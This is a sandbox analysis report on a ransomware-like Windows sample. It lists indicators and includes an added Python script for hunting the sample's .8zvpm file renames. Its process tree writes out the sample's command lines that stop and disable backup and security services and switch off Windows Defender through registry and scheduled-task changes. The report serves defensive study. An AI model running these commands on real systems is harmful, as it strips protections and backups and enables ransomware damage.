Resubmissions
date              task ID             score
12-01-2022 20:48  220112-zlnz9adhf2   10
12-01-2022 19:37  220112-yb5pksdgc6   10
12-01-2022 19:25  220112-x5evksdgdl   10
12-01-2022 16:50  220112-vb8jpadcc4   10

Analysis
max time kernel: 70s
max time network: 19s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 19:37
Static task: static1
Behavioral task: behavioral1, sample cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe, resource win7-en-20211208
Behavioral task: behavioral2, sample cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe, resource win10-en-20211208
General
Target: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Size: 2.6MB
MD5: 47f540350b1d360403225d146cc7fbb8
SHA1: 43ad25b99cb47c7367b1703315402bb9e4970590
SHA256: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
SHA512: 91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes: MpCmdRun.exe (PID 2128)

Modifies security service (2 TTPs, 1 IoC)
Processes: reg.exe, set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes: bcdedit.exe (PID 2064), bcdedit.exe (PID 2088)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Processes: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe, "File opened for modification" on each of the following paths:
C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SmnB7SJfbgM0.8zvpm
C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Paper.eftx.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SCVjS_SUHmc0.8zvpm
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_QSIyA9OrOrc0.8zvpm
C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\FlickLearningWizard.exe.mui
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_0Scc7RX9iWo0.8zvpm
C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\PREVIEW.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_PHbZzK3FX480.8zvpm
C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_zdyceR9rjt40.8zvpm
C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_0aX4uUpandY0.8zvpm
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageStyle.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_TQsmL1HD9Rw0.8zvpm
C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_TjmocohHRaY0.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\URBAN_01.MID.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_jtVUgXbr3nk0.8zvpm
C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\slideShow.html
C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_T2f1YTnh7Vo0.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_V0iNF7Xuy4o0.8zvpm
C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_fT96kQSn-vM0.8zvpm
C:\Program Files\Windows Media Player\en-US\mpvis.dll.mui
C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR12F.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_A3euzVqq1Fg0.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_rVj01KEl7Dc0.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_athj58JoGUE0.8zvpm
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FBXa0bENIu40.8zvpm
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FCqVyLaojd80.8zvpm
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_YHkKzVPIN1I0.8zvpm
C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_nu3S3dfdZB00.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SMD432Qu-ak0.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_CPLnX4BhkuQ0.8zvpm
C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png
C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\PREVIEW.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_cemJP_srwg00.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_tUax988JXcY0.8zvpm
C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7S8RCYjYjiw0.8zvpm
C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_evcSqRAcDvI0.8zvpm
C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_ki1z2DLWmTA0.8zvpm
C:\Program Files (x86)\Common Files\microsoft shared\TextConv\Wks9Pxy.cnv.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_Z9Xk-AfS86c0.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_GppLoEuKDKs0.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02522_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_8B0I7jiiXj00.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7KY_OPnWAaQ0.8zvpm
C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\ShvlRes.dll.mui.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_2HMAyB-0Lgk0.8zvpm
C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_Fprr37D_N440.8zvpm
C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGNHM.POC.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7LIJjfYbKaw0.8zvpm
C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png
C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_KwBppXFmtS40.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_DSb1W5lWS6w0.8zvpm
C:\Program Files\7-Zip\Lang\be.txt.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_60gHKunfb340.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_fUpF3aUXOFc0.8zvpm
C:\Program Files\Windows Journal\Templates\Genko_2.jtp
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00019_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SpjqgTyHBZs0.8zvpm
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FdcJmx7Y2U40.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_ekWVFheNPVQ0.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_BbqsYLdFs180.8zvpm
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_VOy-VR2Iso40.8zvpm
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18202_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_uOcZk-ANPcc0.8zvpm
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_---grD_fTEc0.8zvpm
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_3hpk6qUUMWY0.8zvpm
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_v8Nfnzrqe5E0.8zvpm
C:\Program Files\Java\jre7\lib\zi\Europe\Riga.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_QZVDEoZAMEY0.8zvpm
C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SaZCMITig1I0.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_2TjSCvsIuUw0.8zvpm
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_1iJ3e5SRMqo0.8zvpm
C:\Program Files\Microsoft Games\Hearts\es-ES\Hearts.exe.mui.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_q4ULK1bt1o40.8zvpm
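Every renamed path in the list above has the same shape: the original name, a dot, a 56-character token drawn from the base64url alphabet, and a .8zvpm extension. The first 44 characters of that token are identical across all 64 entries, the last 12 differ per file (and, in this report, all end in "0"). The script below is an added example, not part of the sandbox report or its tooling: it decomposes each path into those parts, checks that the shared token really is constant, separates the entries that carry no suffix (files the sample opened for modification but that the listed event does not show as renamed), and derives a regex for hunting the same naming on other hosts. Only a subset of the report's paths is embedded so it runs offline. The report does not say what either token encodes, so the field names shared and per_file are this script's assumptions.

```python
"""Decompose the renamed-file pattern from the "Drops file in Program Files
directory" IoCs and derive a hunt pattern from it.

Added example, not part of the sandbox report. SAMPLE_PATHS is a subset of the
report's own list, embedded so this runs offline. The split into a 44-char
"shared" token and a 12-char "per_file" token is this script's reading of the
names; the report does not say what either encodes, so the names are assumptions.
"""
import ntpath
import re
from collections import Counter

# Observed shape: <original name>.<56 base64url-alphabet chars>.8zvpm
RENAMED = re.compile(
    r'^(?P<original>.+?)\.'
    r'(?P<shared>[A-Za-z0-9_-]{44})'     # identical across all 64 entries in the report
    r'(?P<per_file>[A-Za-z0-9_-]{12})'   # differs per file
    r'\.(?P<ext>8zvpm)$'
)

SAMPLE_PATHS = [  # subset of the report's IoC list
    r"C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SmnB7SJfbgM0.8zvpm",
    r"C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png",
    r"C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Paper.eftx.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SCVjS_SUHmc0.8zvpm",
    r"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_0Scc7RX9iWo0.8zvpm",
    r"C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\FlickLearningWizard.exe.mui",
    r"C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_---grD_fTEc0.8zvpm",
    r"C:\Program Files\7-Zip\Lang\be.txt.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_60gHKunfb340.8zvpm",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_v8Nfnzrqe5E0.8zvpm",
    r"C:\Program Files\Windows Journal\Templates\Genko_2.jtp",
]


def parse(path):
    """Decomposed name for a renamed file, or None if the name carries no suffix.
    ntpath is used so Windows paths split correctly on any host."""
    m = RENAMED.match(ntpath.basename(path))
    if not m:
        return None
    d = m.groupdict()
    d["directory"] = ntpath.dirname(path)
    return d


def summarize(paths):
    """Split an IoC list into renamed vs merely-opened files and check that the
    shared token is constant and the per-file token unique."""
    parsed = [(p, parse(p)) for p in paths]
    renamed = [d for _, d in parsed if d]
    opened_only = [p for p, d in parsed if d is None]
    per_file = {d["per_file"] for d in renamed}
    return {
        "renamed": len(renamed),
        "opened_only": len(opened_only),
        "shared_tokens": Counter(d["shared"] for d in renamed),
        "per_file_unique": len(per_file) == len(renamed),
        "original_extensions": Counter(ntpath.splitext(d["original"])[1].lower() for d in renamed),
    }


def hunt_regex(shared_token):
    """Regex to hunt for files renamed with the same shared token on other hosts
    (run it over directory listings or EDR file-create/rename events)."""
    return re.compile(r'\.' + re.escape(shared_token) + r'[A-Za-z0-9_-]{12}\.8zvpm$')


if __name__ == "__main__":
    s = summarize(SAMPLE_PATHS)
    print(f"renamed: {s['renamed']}, opened only: {s['opened_only']}")
    print(f"shared tokens: {dict(s['shared_tokens'])}")
    print(f"per-file tokens unique: {s['per_file_unique']}")
    print(f"original extensions: {dict(s['original_extensions'])}")
    print(f"hunt regex: {hunt_regex(next(iter(s['shared_tokens']))).pattern}")
```

If the shared token were derived per victim, a hunt keyed on it would only find this victim's files; the extension part of the pattern (.8zvpm) is the more portable hook until more samples show whether it is fixed.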
Launches sc.exe
sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PID 1708)

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: powershell.exe (PID 2160), powershell.exe (PID 2248), cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe (PID 612)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes and the privileges they adjusted in their token (the sandbox reports LUIDs 33, 34 and 35 unresolved; in winnt.h those are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege):
wevtutil.exe (PID 1592): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 1164): SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 1700): SeSecurityPrivilege, SeBackupPrivilege
wmic.exe (PID 1048): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
wmic.exe (PID 892): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
wmic.exe (PID 892), second adjustment (list cut at the 64-IoC cap): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source PID wrote to the memory of target PID; the sandbox records three writes per child launch, shown here as x3):
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1628 net.exe (x3); 1628 net.exe -> 756 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 432 net.exe (x3); 432 net.exe -> 572 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 304 net.exe (x3); 304 net.exe -> 1372 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 824 net.exe (x3); 824 net.exe -> 788 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1180 net.exe (x3); 1180 net.exe -> 1072 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 624 net.exe (x3); 624 net.exe -> 2016 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 2020 net.exe (x3); 2020 net.exe -> 1332 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1512 net.exe (x3); 1512 net.exe -> 1716 net1.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1692 sc.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1624 sc.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1508 sc.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1780 sc.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1636 sc.exe (x3)
612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> 1764 sc.exe (x1; list cut at the 64-IoC cap)
Processes
Process tree from the behavioral run (indentation = depth; each line gives the command line, then the PID and any signatures the sandbox attached to that process). Image paths, stated once instead of per line: the sample runs from C:\Users\Admin\AppData\Local\Temp\; net.exe, net1.exe, sc.exe, reg.exe, schtasks.exe, vssadmin.exe, wevtutil.exe, bcdedit.exe and cmd.exe run from C:\Windows\system32\; wmic.exe from C:\Windows\System32\Wbem\; powershell.exe from C:\Windows\System32\WindowsPowerShell\v1.0\; MpCmdRun.exe from C:\Program Files\Windows Defender\.

[1] "C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"  (PID 612; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory)
  [2] net.exe stop "NetMsmqActivator" /y  (PID 1628; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "NetMsmqActivator" /y  (PID 756)
  [2] net.exe stop "SamSs" /y  (PID 432; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "SamSs" /y  (PID 572)
  [2] net.exe stop "SDRSVC" /y  (PID 304; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "SDRSVC" /y  (PID 1372)
  [2] net.exe stop "SstpSvc" /y  (PID 824; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "SstpSvc" /y  (PID 788)
  [2] net.exe stop "UI0Detect" /y  (PID 1180; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "UI0Detect" /y  (PID 1072)
  [2] net.exe stop "VSS" /y  (PID 624; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "VSS" /y  (PID 2016)
  [2] net.exe stop "wbengine" /y  (PID 2020; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "wbengine" /y  (PID 1332)
  [2] net.exe stop "WebClient" /y  (PID 1512; Suspicious use of WriteProcessMemory)
    [3] C:\Windows\system32\net1 stop "WebClient" /y  (PID 1716)
  [2] sc.exe config "NetMsmqActivator" start= disabled  (PID 1692)
  [2] sc.exe config "SamSs" start= disabled  (PID 1624)
  [2] sc.exe config "SDRSVC" start= disabled  (PID 1508)
  [2] sc.exe config "SstpSvc" start= disabled  (PID 1780)
  [2] sc.exe config "UI0Detect" start= disabled  (PID 1636)
  [2] sc.exe config "VSS" start= disabled  (PID 1764)
  [2] sc.exe config "wbengine" start= disabled  (PID 1060)
  [2] sc.exe config "WebClient" start= disabled  (PID 868)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f  (PID 1712)
  [2] reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f  (PID 240)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f  (PID 1368)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f  (PID 764)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f  (PID 1840)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f  (PID 1568)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f  (PID 2016)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f  (PID 836)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f  (PID 1696)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f  (PID 1000)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f  (PID 1856)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f  (PID 1820)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f  (PID 1732)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f  (PID 676)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f  (PID 924)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f  (PID 1772)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable  (PID 1528)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable  (PID 1376)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable  (PID 1988)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable  (PID 1136)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable  (PID 2024)
  [2] reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f  (PID 1980)
  [2] reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f  (PID 1492)
  [2] reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f  (PID 1300)
